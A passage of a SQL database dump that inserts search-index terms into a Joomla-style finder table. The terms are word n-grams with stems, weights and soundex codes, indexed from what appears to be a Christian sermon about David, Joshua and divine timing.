(299437, 'be focused to', 'be focused to', 0, 1, 1.4333, 'B230', 1, '*'),
(299438, 'be inevitable', 'be inevitable', 0, 1, 1.4333, 'B51314', 1, '*'),
(299439, 'be inevitable wisdom', 'be inevitable wisdom', 0, 1, 1.6667, 'B51314235', 1, '*'),
(299440, 'be possessed', 'be possessed', 0, 1, 1.4, 'B230', 1, '*'),
(299441, 'beauty', 'beauti', 0, 0, 0.4, 'B300', 1, '*'),
(299442, 'beauty youthful', 'beauti youthful', 0, 1, 1.5, 'B314', 1, '*'),
(299443, 'beauty youthful enhancement', 'beauti youthful enhancement', 0, 1, 1.9, 'B3145253', 1, '*'),
(299444, 'because at', 'becaus at', 0, 1, 1.3333, 'B230', 1, '*'),
(299445, 'because at god\'s', 'becaus at god', 0, 1, 1.5333, 'B23232', 1, '*'),
(299446, 'because he still', 'becaus he still', 0, 1, 1.5333, 'B234', 1, '*'),
(299447, 'because she', 'becaus she', 0, 1, 1.3667, 'B200', 1, '*'),
(299448, 'because she missed', 'becaus she missed', 0, 1, 1.6, 'B2523', 1, '*'),
(299449, 'brought by', 'brought by', 0, 1, 1.3333, 'B6231', 1, '*'),
(299450, 'brought by the', 'brought by the', 0, 1, 1.4667, 'B62313', 1, '*'),
(299451, 'by men', 'by men', 0, 1, 1.2, 'B500', 1, '*'),
(299452, 'by men some', 'by men some', 0, 1, 1.3667, 'B525', 1, '*'),
(299453, 'by the devil', 'by the devil', 0, 1, 1.4, 'B314', 1, '*'),
(299454, 'by this', 'by this', 0, 1, 1.2333, 'B320', 1, '*'),
(299455, 'by this is', 'by this is', 0, 1, 1.3333, 'B320', 1, '*'),
(299456, 'by yourself', 'by yourself', 0, 1, 1.3667, 'B6241', 1, '*'),
(299457, 'by yourself wrong', 'by yourself wrong', 0, 1, 1.5667, 'B6241652', 1, '*'),
(299458, 'calendar of', 'calendar of', 0, 1, 1.3667, 'C45361', 1, '*'),
(299459, 'calendar of god', 'calendar of god', 0, 1, 1.5, 'C4536123', 1, '*'),
(299460, 'came out', 'came out', 0, 1, 1.2667, 'C530', 1, '*'),
(299461, 'came out of', 'came out of', 0, 1, 1.3667, 'C531', 1, '*'),
(299462, 'came without', 'came without', 0, 1, 1.4, 'C530', 1, '*'),
(299463, 'came without invitation', 'came without invitation', 0, 1, 1.7667, 'C535135', 1, '*'),
(299464, 'can be focused', 'can be focused', 0, 1, 1.4667, 'C5123', 1, '*'),
(299465, 'can see', 'can see', 0, 1, 1.2333, 'C520', 1, '*'),
(299466, 'can see in', 'can see in', 0, 1, 1.3333, 'C525', 1, '*'),
(299467, 'can\'t just', 'can just', 0, 1, 1.3333, 'C5323', 1, '*'),
(299468, 'can\'t just be', 'can just be', 0, 1, 1.4333, 'C53231', 1, '*'),
(299469, 'city of', 'citi of', 0, 1, 1.2333, 'C310', 1, '*'),
(299470, 'city of jerusalem', 'citi of jerusalem', 0, 1, 1.5667, 'C3126245', 1, '*'),
(299471, 'commit evil', 'commit evil', 0, 1, 1.3667, 'C5314', 1, '*'),
(299472, 'commit evil acts', 'commit evil acts', 0, 1, 1.5333, 'C5314232', 1, '*'),
(299473, 'compromise regret', 'compromis regret', 0, 1, 1.5667, 'C516526263', 1, '*'),
(299474, 'compromise regret don\'t', 'compromis regret don', 0, 1, 1.7667, 'C51652626353', 1, '*'),
(299475, 'conquer', 'conquer', 0, 0, 0.4667, 'C526', 1, '*'),
(299476, 'conquer laziness', 'conquer laziness', 0, 1, 1.5333, 'C5264252', 1, '*'),
(299477, 'conquer laziness and', 'conquer laziness and', 0, 1, 1.6667, 'C526425253', 1, '*'),
(299478, 'correct yesterday\'s', 'correct yesterday', 0, 1, 1.6333, 'C62323632', 1, '*'),
(299479, 'correct yesterday\'s flaws', 'correct yesterday flaws', 0, 1, 1.8333, 'C62323632142', 1, '*'),
(299480, 'could eventually', 'could eventually', 0, 1, 1.5333, 'C431534', 1, '*'),
(299481, 'could eventually lead', 'could eventually lead', 0, 1, 1.7, 'C4315343', 1, '*'),
(299482, 'course for', 'cours for', 0, 1, 1.3333, 'C6216', 1, '*'),
(299483, 'course for your', 'cours for your', 0, 1, 1.5, 'C6216', 1, '*'),
(299484, 'cover up', 'cover up', 0, 1, 1.2667, 'C161', 1, '*'),
(299485, 'cover up 2', 'cover up 2', 0, 1, 1.3333, 'C161', 1, '*'),
(299486, 'cover you', 'cover you', 0, 1, 1.3, 'C160', 1, '*'),
(299487, 'cover you are', 'cover you are', 0, 1, 1.4333, 'C160', 1, '*'),
(299488, 'daily schedule', 'daili schedule', 0, 1, 1.4667, 'D4234', 1, '*'),
(299489, 'daily schedule so', 'daili schedule so', 0, 1, 1.5667, 'D42342', 1, '*'),
(299490, 'david into', 'david into', 0, 1, 1.3333, 'D1353', 1, '*'),
(299491, 'david into a', 'david into a', 0, 1, 1.4, 'D1353', 1, '*'),
(299492, 'david the', 'david the', 0, 1, 1.3, 'D130', 1, '*'),
(299493, 'david the king', 'david the king', 0, 1, 1.4667, 'D13252', 1, '*'),
(299494, 'david was a', 'david was a', 0, 1, 1.3667, 'D132', 1, '*'),
(299495, 'decision if', 'decis if', 0, 1, 1.3667, 'D251', 1, '*'),
(299496, 'decision if you', 'decis if you', 0, 1, 1.5, 'D251', 1, '*'),
(299497, 'deep respect', 'deep respect', 0, 1, 1.4, 'D162123', 1, '*'),
(299498, 'deep respect for', 'deep respect for', 0, 1, 1.5333, 'D16212316', 1, '*'),
(299499, 'described him', 'describ him', 0, 1, 1.4333, 'D26135', 1, '*'),
(299500, 'described him as', 'describ him as', 0, 1, 1.5333, 'D261352', 1, '*'),
(299501, 'destiny offences', 'destini offences', 0, 1, 1.5333, 'D235152', 1, '*'),
(299502, 'destiny offences and', 'destini offences and', 0, 1, 1.6667, 'D23515253', 1, '*'),
(299503, 'devil also', 'devil also', 0, 1, 1.3333, 'D142', 1, '*'),
(299504, 'devil also targets', 'devil also targets', 0, 1, 1.6, 'D14236232', 1, '*'),
(299505, 'devil some', 'devil some', 0, 1, 1.3333, 'D1425', 1, '*'),
(299506, 'devil some by', 'devil some by', 0, 1, 1.4333, 'D14251', 1, '*'),
(299507, 'devil successfully', 'devil successfully', 0, 1, 1.6, 'D14214', 1, '*'),
(299508, 'devil successfully got', 'devil successfully got', 0, 1, 1.7333, 'D1421423', 1, '*'),
(299509, 'didn\'t plant', 'didn plant', 0, 1, 1.4, 'D531453', 1, '*'),
(299510, 'didn\'t plant in', 'didn plant in', 0, 1, 1.5, 'D5314535', 1, '*'),
(299511, 'disrespect', 'disrespect', 0, 0, 0.6667, 'D262123', 1, '*'),
(299512, 'disrespect for', 'disrespect for', 0, 1, 1.4667, 'D26212316', 1, '*'),
(299513, 'disrespect for divine', 'disrespect for divine', 0, 1, 1.7, 'D26212316315', 1, '*'),
(299514, 'distracted', 'distract', 0, 0, 0.6667, 'D23623', 1, '*'),
(299515, 'distracted here', 'distract here', 0, 1, 1.5, 'D236236', 1, '*'),
(299516, 'distracted here are', 'distract here are', 0, 1, 1.6333, 'D236236', 1, '*'),
(299517, 'divine timing', 'divin timing', 0, 1, 1.4333, 'D15352', 1, '*'),
(299518, 'divine timing althoughdavid', 'divin timing althoughdavid', 0, 1, 1.9, 'D15352432313', 1, '*'),
(299519, 'divine timing could', 'divin timing could', 0, 1, 1.6333, 'D1535243', 1, '*'),
(299520, 'divine timing for', 'divin timing for', 0, 1, 1.5667, 'D1535216', 1, '*'),
(299521, 'do the', 'do the', 0, 1, 1.2, 'D000', 2, '*'),
(299522, 'do the same', 'do the same', 0, 1, 1.3667, 'D250', 2, '*'),
(299523, 'do things', 'do things', 0, 1, 1.3, 'D520', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(299524, 'do things at', 'do things at', 0, 1, 1.4, 'D523', 1, '*'),
(299525, 'don\'t do things', 'don do things', 0, 1, 1.5, 'D5352', 1, '*'),
(299526, 'don\'t mourn', 'don mourn', 0, 1, 1.3667, 'D53565', 1, '*'),
(299527, 'don\'t mourn over', 'don mourn over', 0, 1, 1.5333, 'D5356516', 1, '*'),
(299528, 'done at', 'done at', 0, 1, 1.2333, 'D530', 1, '*'),
(299529, 'done at old', 'done at old', 0, 1, 1.3667, 'D5343', 1, '*'),
(299530, 'down sins', 'down sins', 0, 1, 1.3, 'D5252', 1, '*'),
(299531, 'down sins using', 'down sins using', 0, 1, 1.5, 'D525252', 1, '*'),
(299532, 'down you\'re', 'down you', 0, 1, 1.3667, 'D560', 1, '*'),
(299533, 'down you\'re also', 'down you also', 0, 1, 1.5333, 'D5642', 1, '*'),
(299534, 'ecc', 'ecc', 0, 0, 0.2, 'E200', 1, '*'),
(299535, 'ecc 8', 'ecc 8', 0, 1, 1.1667, 'E200', 1, '*'),
(299536, 'ecc 8 5', 'ecc 8 5', 0, 1, 1.2333, 'E200', 1, '*'),
(299537, 'either no', 'either no', 0, 1, 1.3, 'E365', 1, '*'),
(299538, 'either no matter', 'either no matter', 0, 1, 1.5333, 'E36536', 1, '*'),
(299539, 'eliminate', 'elimin', 0, 0, 0.6, 'E453', 1, '*'),
(299540, 'eliminate time', 'elimin time', 0, 1, 1.4667, 'E4535', 1, '*'),
(299541, 'eliminate time wasters', 'elimin time wasters', 0, 1, 1.7333, 'E45352362', 1, '*'),
(299542, 'enhancement', 'enhanc', 0, 0, 0.7333, 'E5253', 1, '*'),
(299543, 'enhancement strategies', 'enhanc strategies', 0, 1, 1.7333, 'E525323632', 1, '*'),
(299544, 'enhancement strategies you', 'enhanc strategies you', 0, 1, 1.8667, 'E525323632', 1, '*'),
(299545, 'especially when', 'especi when', 0, 1, 1.5, 'E21245', 1, '*'),
(299546, 'especially when it', 'especi when it', 0, 1, 1.6, 'E212453', 1, '*'),
(299547, 'eventually lead', 'eventu lead', 0, 1, 1.5, 'E15343', 1, '*'),
(299548, 'eventually lead to', 'eventu lead to', 0, 1, 1.6, 'E15343', 1, '*'),
(299549, 'everyday and', 'everydai and', 0, 1, 1.4, 'E16353', 1, '*'),
(299550, 'everyday and it', 'everydai and it', 0, 1, 1.5, 'E16353', 1, '*'),
(299551, 'evil acts', 'evil acts', 0, 1, 1.3, 'E14232', 1, '*'),
(299552, 'evil acts works', 'evil acts works', 0, 1, 1.5, 'E1423262', 1, '*'),
(299553, 'fast as', 'fast as', 0, 1, 1.2333, 'F232', 1, '*'),
(299554, 'fast as possible', 'fast as possible', 0, 1, 1.5333, 'F2321214', 1, '*'),
(299555, 'fear unbelief', 'fear unbelief', 0, 1, 1.4333, 'F65141', 1, '*'),
(299556, 'fear unbelief incomplete', 'fear unbelief incomplete', 0, 1, 1.8, 'F65141525143', 1, '*'),
(299557, 'first step that', 'first step that', 0, 1, 1.5, 'F6232313', 1, '*'),
(299558, 'flaws', 'flaw', 0, 0, 0.3333, 'F420', 1, '*'),
(299559, 'flaws fear', 'flaw fear', 0, 1, 1.3333, 'F4216', 1, '*'),
(299560, 'flaws fear unbelief', 'flaw fear unbelief', 0, 1, 1.6333, 'F42165141', 1, '*'),
(299561, 'focused to', 'focus to', 0, 1, 1.3333, 'F230', 1, '*'),
(299562, 'focused to pursue', 'focus to pursue', 0, 1, 1.5667, 'F23162', 1, '*'),
(299563, 'for divine timing', 'for divine timing', 0, 1, 1.5667, 'F6315352', 1, '*'),
(299564, 'for joshua', 'for joshua', 0, 1, 1.3333, 'F620', 1, '*'),
(299565, 'for joshua there', 'for joshua there', 0, 1, 1.5333, 'F6236', 1, '*'),
(299566, 'for the future', 'for the future', 0, 1, 1.4667, 'F63136', 1, '*'),
(299567, 'for timing', 'for timing', 0, 1, 1.3333, 'F6352', 1, '*'),
(299568, 'for timing and', 'for timing and', 0, 1, 1.4667, 'F635253', 1, '*'),
(299569, 'for your lives', 'for your lives', 0, 1, 1.4667, 'F6412', 1, '*'),
(299570, 'from leprosy', 'from leprosy', 0, 1, 1.4, 'F654162', 1, '*'),
(299571, 'from leprosy in', 'from leprosy in', 0, 1, 1.5, 'F6541625', 1, '*'),
(299572, 'from your daily', 'from your daily', 0, 1, 1.5, 'F65634', 1, '*'),
(299573, 'future and how', 'futur and how', 0, 1, 1.4667, 'F3653', 1, '*'),
(299574, 'generational', 'gener', 0, 0, 0.8, 'G56354', 2, '*'),
(299575, 'generational problems', 'gener problems', 0, 1, 1.7, 'G56354161452', 1, '*'),
(299576, 'generational problems as', 'gener problems as', 0, 1, 1.8, 'G56354161452', 1, '*'),
(299577, 'get distracted', 'get distracted', 0, 1, 1.4667, 'G323623', 1, '*'),
(299578, 'get distracted here', 'get distracted here', 0, 1, 1.6333, 'G3236236', 1, '*'),
(299579, 'get rid', 'get rid', 0, 1, 1.2333, 'G363', 1, '*'),
(299580, 'get rid of', 'get rid of', 0, 1, 1.3333, 'G3631', 1, '*'),
(299581, 'getting older', 'get older', 0, 1, 1.4333, 'G352436', 1, '*'),
(299582, 'getting older if', 'get older if', 0, 1, 1.5333, 'G3524361', 1, '*'),
(299583, 'getting younger', 'get younger', 0, 1, 1.5, 'G352526', 1, '*'),
(299584, 'getting younger either', 'get younger either', 0, 1, 1.7333, 'G35252636', 1, '*'),
(299585, 'god didn\'t', 'god didn', 0, 1, 1.3333, 'G353', 1, '*'),
(299586, 'god didn\'t plant', 'god didn plant', 0, 1, 1.5333, 'G3531453', 1, '*'),
(299587, 'god has a', 'god has a', 0, 1, 1.3, 'G320', 1, '*'),
(299588, 'god himself', 'god himself', 0, 1, 1.3667, 'G35241', 1, '*'),
(299589, 'god himself described', 'god himself described', 0, 1, 1.7, 'G3524132613', 1, '*'),
(299590, 'god shows', 'god shows', 0, 1, 1.3, 'G320', 1, '*'),
(299591, 'god shows up', 'god shows up', 0, 1, 1.4, 'G321', 1, '*'),
(299592, 'god\'s course', 'god course', 0, 1, 1.4, 'G3262', 1, '*'),
(299593, 'god\'s course for', 'god course for', 0, 1, 1.5333, 'G326216', 1, '*'),
(299594, 'god\'s prophetic', 'god prophetic', 0, 1, 1.5, 'G3216132', 1, '*'),
(299595, 'god\'s prophetic time', 'god prophetic time', 0, 1, 1.6667, 'G321613235', 1, '*'),
(299596, 'gone reach', 'gone reach', 0, 1, 1.3333, 'G562', 1, '*'),
(299597, 'gone reach out', 'gone reach out', 0, 1, 1.4667, 'G5623', 1, '*'),
(299598, 'got him', 'got him', 0, 1, 1.2333, 'G350', 1, '*'),
(299599, 'got him into', 'got him into', 0, 1, 1.4, 'G353', 1, '*'),
(299600, 'great authority', 'great authority', 0, 1, 1.5, 'G6363', 1, '*'),
(299601, 'great authority but', 'great authority but', 0, 1, 1.6333, 'G636313', 1, '*'),
(299602, 'great men have', 'great men have', 0, 1, 1.4667, 'G6351', 1, '*'),
(299603, 'grounds to', 'ground to', 0, 1, 1.3333, 'G65323', 1, '*'),
(299604, 'grounds to cover', 'ground to cover', 0, 1, 1.5333, 'G65323216', 1, '*'),
(299605, 'grow in years', 'grow in years', 0, 1, 1.4333, 'G6562', 1, '*'),
(299606, 'had a lot', 'had a lot', 0, 1, 1.3, 'H343', 1, '*'),
(299607, 'has a deep', 'ha a deep', 0, 1, 1.3333, 'H231', 1, '*'),
(299608, 'have great', 'have great', 0, 1, 1.3333, 'H1263', 1, '*'),
(299609, 'have great authority', 'have great authority', 0, 1, 1.6667, 'H126363', 1, '*'),
(299610, 'have not accomplished', 'have not accomplished', 0, 1, 1.7, 'H153251423', 1, '*'),
(299611, 'have within', 'have within', 0, 1, 1.3667, 'H135', 1, '*'),
(299612, 'have within a', 'have within a', 0, 1, 1.4333, 'H135', 1, '*'),
(299613, 'he still', 'he still', 0, 1, 1.2667, 'H234', 1, '*'),
(299614, 'he still had', 'he still had', 0, 1, 1.4, 'H2343', 1, '*'),
(299615, 'heart 26 03', 'heart 26 03', 0, 1, 1.3667, 'H630', 1, '*'),
(299616, 'heart act', 'heart act', 0, 1, 1.3, 'H6323', 1, '*'),
(299617, 'heart act 13', 'heart act 13', 0, 1, 1.4, 'H6323', 1, '*'),
(299618, 'held down', 'held down', 0, 1, 1.3, 'H435', 1, '*'),
(299619, 'held down sins', 'held down sins', 0, 1, 1.4667, 'H435252', 1, '*'),
(299620, 'her time', 'her time', 0, 1, 1.2667, 'H635', 2, '*'),
(299621, 'her time and', 'her time and', 0, 1, 1.4, 'H6353', 1, '*'),
(299622, 'her time of', 'her time of', 0, 1, 1.3667, 'H6351', 1, '*'),
(299623, 'him as a', 'him as a', 0, 1, 1.2667, 'H520', 1, '*'),
(299624, 'him into', 'him into', 0, 1, 1.2667, 'H530', 1, '*'),
(299625, 'him into a', 'him into a', 0, 1, 1.3333, 'H530', 1, '*'),
(299626, 'him you are', 'him you are', 0, 1, 1.3667, 'H560', 2, '*'),
(299627, 'himself described', 'himself described', 0, 1, 1.5667, 'H524132613', 1, '*'),
(299628, 'himself described him', 'himself described him', 0, 1, 1.7, 'H5241326135', 1, '*'),
(299629, 'his disrespect', 'hi disrespect', 0, 1, 1.4667, 'H23262123', 1, '*'),
(299630, 'his disrespect for', 'hi disrespect for', 0, 1, 1.6, 'H2326212316', 1, '*'),
(299631, 'his own heart', 'hi own heart', 0, 1, 1.4333, 'H2563', 1, '*'),
(299632, 'hold people', 'hold people', 0, 1, 1.3667, 'H4314', 1, '*'),
(299633, 'hold people down', 'hold people down', 0, 1, 1.5333, 'H431435', 1, '*'),
(299634, 'how to use', 'how to use', 0, 1, 1.3333, 'H320', 1, '*'),
(299635, 'however the devil', 'howev the devil', 0, 1, 1.5667, 'H16314', 1, '*'),
(299636, 'identify', 'identifi', 0, 0, 0.5333, 'I3531', 1, '*'),
(299637, 'identify and', 'identifi and', 0, 1, 1.4, 'I353153', 1, '*'),
(299638, 'identify and eliminate', 'identifi and eliminate', 0, 1, 1.7333, 'I353153453', 1, '*'),
(299639, 'if you hold', 'if you hold', 0, 1, 1.3667, 'I143', 1, '*'),
(299640, 'in mess', 'in mess', 0, 1, 1.2333, 'I520', 1, '*'),
(299641, 'in mess today', 'in mess today', 0, 1, 1.4333, 'I523', 1, '*'),
(299642, 'in number 16', 'in number 16', 0, 1, 1.4, 'I516', 1, '*'),
(299643, 'in years', 'in years', 0, 1, 1.2667, 'I562', 1, '*'),
(299644, 'in years and', 'in years and', 0, 1, 1.4, 'I56253', 1, '*'),
(299645, 'in years you', 'in years you', 0, 1, 1.4, 'I562', 1, '*'),
(299646, 'incomplete', 'incomplet', 0, 0, 0.6667, 'I525143', 1, '*'),
(299647, 'incomplete or', 'incomplet or', 0, 1, 1.4333, 'I5251436', 1, '*'),
(299648, 'incomplete or lack', 'incomplet or lack', 0, 1, 1.6, 'I525143642', 1, '*'),
(299649, 'inevitable', 'inevit', 0, 0, 0.6667, 'I51314', 1, '*'),
(299650, 'inevitable wisdom', 'inevit wisdom', 0, 1, 1.5667, 'I51314235', 1, '*'),
(299651, 'inevitable wisdom is', 'inevit wisdom is', 0, 1, 1.6667, 'I513142352', 1, '*'),
(299652, 'initiate', 'initi', 0, 0, 0.5333, 'I530', 1, '*'),
(299653, 'initiate new', 'initi new', 0, 1, 1.4, 'I535', 1, '*'),
(299654, 'initiate new things', 'initi new things', 0, 1, 1.6333, 'I535352', 1, '*'),
(299655, 'into a mess', 'into a mess', 0, 1, 1.3667, 'I5352', 1, '*'),
(299656, 'introduce mess', 'introduc mess', 0, 1, 1.4667, 'I5363252', 1, '*'),
(299657, 'introduce mess into', 'introduc mess into', 0, 1, 1.6333, 'I536325253', 1, '*'),
(299658, 'invitation', 'invit', 0, 0, 0.6667, 'I5135', 1, '*'),
(299659, 'invitation and', 'invit and', 0, 1, 1.4667, 'I51353', 1, '*'),
(299660, 'invitation and some', 'invit and some', 0, 1, 1.6333, 'I5135325', 1, '*'),
(299661, 'is a calendar', 'is a calendar', 0, 1, 1.4333, 'I24536', 1, '*'),
(299662, 'is actually', 'is actually', 0, 1, 1.3667, 'I234', 1, '*'),
(299663, 'is actually 80', 'is actually 80', 0, 1, 1.4667, 'I234', 1, '*'),
(299664, 'is because at', 'is because at', 0, 1, 1.4333, 'I2123', 1, '*'),
(299665, 'is gone', 'is gone', 0, 1, 1.2333, 'I250', 1, '*'),
(299666, 'is gone reach', 'is gone reach', 0, 1, 1.4333, 'I2562', 1, '*'),
(299667, 'is still in', 'is still in', 0, 1, 1.3667, 'I2345', 1, '*'),
(299668, 'is undue', 'is undue', 0, 1, 1.2667, 'I253', 1, '*'),
(299669, 'is undue or', 'is undue or', 0, 1, 1.3667, 'I2536', 1, '*'),
(299670, 'it is gone', 'it is gone', 0, 1, 1.3333, 'I325', 1, '*'),
(299671, 'it is undue', 'it is undue', 0, 1, 1.3667, 'I3253', 1, '*'),
(299672, 'it to correct', 'it to correct', 0, 1, 1.4333, 'I32623', 1, '*'),
(299673, 'item 37', 'item 37', 0, 1, 1.2333, 'I350', 1, '*'),
(299674, 'item 37 from', 'item 37 from', 0, 1, 1.4, 'I35165', 1, '*'),
(299675, 'jerusalem', 'jerusalem', 0, 0, 0.6, 'J6245', 1, '*'),
(299676, 'jerusalem is', 'jerusalem is', 0, 1, 1.4, 'J62452', 1, '*'),
(299677, 'jerusalem is still', 'jerusalem is still', 0, 1, 1.6, 'J6245234', 1, '*'),
(299678, 'joshua 13', 'joshua 13', 0, 1, 1.3, 'J000', 1, '*'),
(299679, 'joshua 13 1', 'joshua 13 1', 0, 1, 1.3667, 'J000', 1, '*'),
(299680, 'joshua there', 'joshua there', 0, 1, 1.4, 'J360', 1, '*'),
(299681, 'joshua there was', 'joshua there was', 0, 1, 1.5333, 'J362', 1, '*'),
(299682, 'joshua was', 'joshua was', 0, 1, 1.3333, 'J000', 1, '*'),
(299683, 'joshua was old', 'joshua was old', 0, 1, 1.4667, 'J430', 1, '*'),
(299684, 'just be done', 'just be done', 0, 1, 1.4, 'J3135', 1, '*'),
(299685, 'k2 item 37', 'k2 item 37', 0, 1, 1.3333, 'K350', 1, '*'),
(299686, 'king conquer', 'king conquer', 0, 1, 1.4, 'K52526', 1, '*'),
(299687, 'king conquer laziness', 'king conquer laziness', 0, 1, 1.7, 'K525264252', 1, '*'),
(299688, 'lack', 'lack', 0, 0, 0.2667, 'L200', 1, '*'),
(299689, 'lack of', 'lack of', 0, 1, 1.2333, 'L210', 1, '*'),
(299690, 'lack of training', 'lack of training', 0, 1, 1.5333, 'L213652', 1, '*'),
(299691, 'land yet', 'land yet', 0, 1, 1.2667, 'L530', 1, '*'),
(299692, 'land yet to', 'land yet to', 0, 1, 1.3667, 'L530', 1, '*'),
(299693, 'laziness', 'lazi', 0, 0, 0.5333, 'L252', 1, '*'),
(299694, 'laziness and', 'lazi and', 0, 1, 1.4, 'L25253', 1, '*'),
(299695, 'laziness and procrastination', 'lazi and procrastination', 0, 1, 1.9333, 'L25253162623535', 1, '*'),
(299696, 'lead to', 'lead to', 0, 1, 1.2333, 'L300', 1, '*'),
(299697, 'lead to generational', 'lead to generational', 0, 1, 1.6667, 'L3256354', 1, '*'),
(299698, 'led david', 'led david', 0, 1, 1.3, 'L313', 1, '*'),
(299699, 'led david into', 'led david into', 0, 1, 1.4667, 'L31353', 1, '*'),
(299700, 'leprosy', 'leprosi', 0, 0, 0.4667, 'L162', 1, '*'),
(299701, 'leprosy in', 'leprosi in', 0, 1, 1.3333, 'L1625', 1, '*'),
(299702, 'leprosy in number', 'leprosi in number', 0, 1, 1.5667, 'L162516', 1, '*'),
(299703, 'life and not', 'life and not', 0, 1, 1.4, 'L15353', 1, '*'),
(299704, 'life ecc', 'life ecc', 0, 1, 1.2667, 'L120', 1, '*'),
(299705, 'life ecc 8', 'life ecc 8', 0, 1, 1.3333, 'L120', 1, '*'),
(299706, 'life of david', 'life of david', 0, 1, 1.4333, 'L1313', 1, '*'),
(299707, 'life some', 'life some', 0, 1, 1.3, 'L125', 1, '*'),
(299708, 'life some are', 'life some are', 0, 1, 1.4333, 'L1256', 1, '*'),
(299709, 'life which', 'life which', 0, 1, 1.3333, 'L120', 1, '*'),
(299710, 'life which you', 'life which you', 0, 1, 1.4667, 'L120', 1, '*'),
(299711, 'live by this', 'live by this', 0, 1, 1.4, 'L132', 1, '*'),
(299712, 'lives david', 'live david', 0, 1, 1.3667, 'L12313', 1, '*'),
(299713, 'lives david was', 'live david was', 0, 1, 1.5, 'L123132', 1, '*'),
(299714, 'lives god', 'live god', 0, 1, 1.3, 'L123', 1, '*'),
(299715, 'lives god shows', 'live god shows', 0, 1, 1.5, 'L1232', 1, '*'),
(299716, 'lord said', 'lord said', 0, 1, 1.3, 'L6323', 2, '*'),
(299717, 'lord said to', 'lord said to', 0, 1, 1.4, 'L6323', 1, '*'),
(299718, 'lot of grounds', 'lot of grounds', 0, 1, 1.4667, 'L3126532', 1, '*'),
(299719, 'luke 19 41', 'luke 19 41', 0, 1, 1.3333, 'L200', 1, '*'),
(299720, 'man after', 'man after', 0, 1, 1.3, 'M136', 1, '*'),
(299721, 'man after his', 'man after his', 0, 1, 1.4333, 'M1362', 1, '*'),
(299722, 'man anointed', 'man anointed', 0, 1, 1.4, 'M300', 1, '*'),
(299723, 'man anointed of', 'man anointed of', 0, 1, 1.5, 'M310', 1, '*'),
(299724, 'man on', 'man on', 0, 1, 1.2, 'M000', 1, '*'),
(299725, 'man on the', 'man on the', 0, 1, 1.3333, 'M300', 1, '*'),
(299726, 'man with an', 'man with an', 0, 1, 1.3667, 'M350', 1, '*'),
(299727, 'matter the beauty', 'matter the beauty', 0, 1, 1.5667, 'M36313', 1, '*'),
(299728, 'men have great', 'men have great', 0, 1, 1.4667, 'M1263', 1, '*'),
(299729, 'men some came', 'men some came', 0, 1, 1.4333, 'M2525', 1, '*'),
(299730, 'mess into', 'mess into', 0, 1, 1.3, 'M253', 1, '*'),
(299731, 'mess into our', 'mess into our', 0, 1, 1.4333, 'M2536', 1, '*'),
(299732, 'mess it', 'mess it', 0, 1, 1.2333, 'M230', 1, '*'),
(299733, 'mess it was', 'mess it was', 0, 1, 1.3667, 'M232', 1, '*'),
(299734, 'mess of', 'mess of', 0, 1, 1.2333, 'M210', 1, '*'),
(299735, 'mess of murder', 'mess of murder', 0, 1, 1.4667, 'M215636', 1, '*'),
(299736, 'mess today', 'mess today', 0, 1, 1.3333, 'M230', 1, '*'),
(299737, 'mess today because', 'mess today because', 0, 1, 1.6, 'M2312', 1, '*'),
(299738, 'mess was', 'mess was', 0, 1, 1.2667, 'M200', 1, '*'),
(299739, 'mess was his', 'mess was his', 0, 1, 1.4, 'M200', 1, '*'),
(299740, 'mess will', 'mess will', 0, 1, 1.3, 'M240', 1, '*'),
(299741, 'mess will be', 'mess will be', 0, 1, 1.4, 'M241', 1, '*'),
(299742, 'miriam', 'miriam', 0, 0, 0.4, 'M650', 1, '*'),
(299743, 'miriam wasted', 'miriam wasted', 0, 1, 1.4333, 'M6523', 1, '*'),
(299744, 'miriam wasted her', 'miriam wasted her', 0, 1, 1.5667, 'M65236', 1, '*'),
(299745, 'missed her', 'miss her', 0, 1, 1.3333, 'M236', 1, '*'),
(299746, 'missed her time', 'miss her time', 0, 1, 1.5, 'M23635', 1, '*'),
(299747, 'mistakes god', 'mistak god', 0, 1, 1.4, 'M2323', 1, '*'),
(299748, 'mistakes god has', 'mistak god has', 0, 1, 1.5333, 'M23232', 1, '*'),
(299749, 'mourn', 'mourn', 0, 0, 0.3333, 'M650', 1, '*'),
(299750, 'mourn over', 'mourn over', 0, 1, 1.3333, 'M6516', 1, '*'),
(299751, 'mourn over the', 'mourn over the', 0, 1, 1.4667, 'M65163', 1, '*'),
(299752, 'much land', 'much land', 0, 1, 1.3, 'M2453', 1, '*'),
(299753, 'much land yet', 'much land yet', 0, 1, 1.4333, 'M2453', 1, '*'),
(299754, 'murder', 'murder', 0, 0, 0.4, 'M636', 1, '*'),
(299755, 'murder adultery', 'murder adultery', 0, 1, 1.5, 'M6363436', 1, '*'),
(299756, 'murder adultery and', 'murder adultery and', 0, 1, 1.6333, 'M636343653', 1, '*'),
(299757, 'must train', 'must train', 0, 1, 1.3333, 'M2365', 1, '*'),
(299758, 'must train yourself', 'must train yourself', 0, 1, 1.6333, 'M23656241', 1, '*'),
(299759, 'must understand and', 'must understand and', 0, 1, 1.6333, 'M23536235353', 1, '*'),
(299760, 'nation recovering', 'nation recovering', 0, 1, 1.5667, 'N35621652', 1, '*'),
(299761, 'nation recovering from', 'nation recovering from', 0, 1, 1.7333, 'N35621652165', 1, '*'),
(299762, 'need to eliminate', 'need to eliminate', 0, 1, 1.5667, 'N3453', 1, '*'),
(299763, 'new things however', 'new things however', 0, 1, 1.6, 'N35216', 1, '*'),
(299764, 'not accomplished', 'not accomplished', 0, 1, 1.5333, 'N3251423', 1, '*'),
(299765, 'not accomplished what', 'not accomplished what', 0, 1, 1.7, 'N3251423', 1, '*'),
(299766, 'not get distracted', 'not get distracted', 0, 1, 1.6, 'N32323623', 1, '*'),
(299767, 'not getting', 'not getting', 0, 1, 1.3667, 'N32352', 1, '*'),
(299768, 'not getting younger', 'not getting younger', 0, 1, 1.6333, 'N32352526', 1, '*'),
(299769, 'not recognising', 'not recognising', 0, 1, 1.5, 'N3625252', 1, '*'),
(299770, 'not recognising divine', 'not recognising divine', 0, 1, 1.7333, 'N3625252315', 1, '*'),
(299771, 'not without', 'not without', 0, 1, 1.3667, 'N300', 1, '*'),
(299772, 'not without scars', 'not without scars', 0, 1, 1.5667, 'N3262', 1, '*'),
(299773, 'now joshua', 'now joshua', 0, 1, 1.3333, 'N200', 1, '*'),
(299774, 'now joshua was', 'now joshua was', 0, 1, 1.4667, 'N200', 1, '*'),
(299775, 'number 16', 'number 16', 0, 1, 1.3, 'N160', 1, '*'),
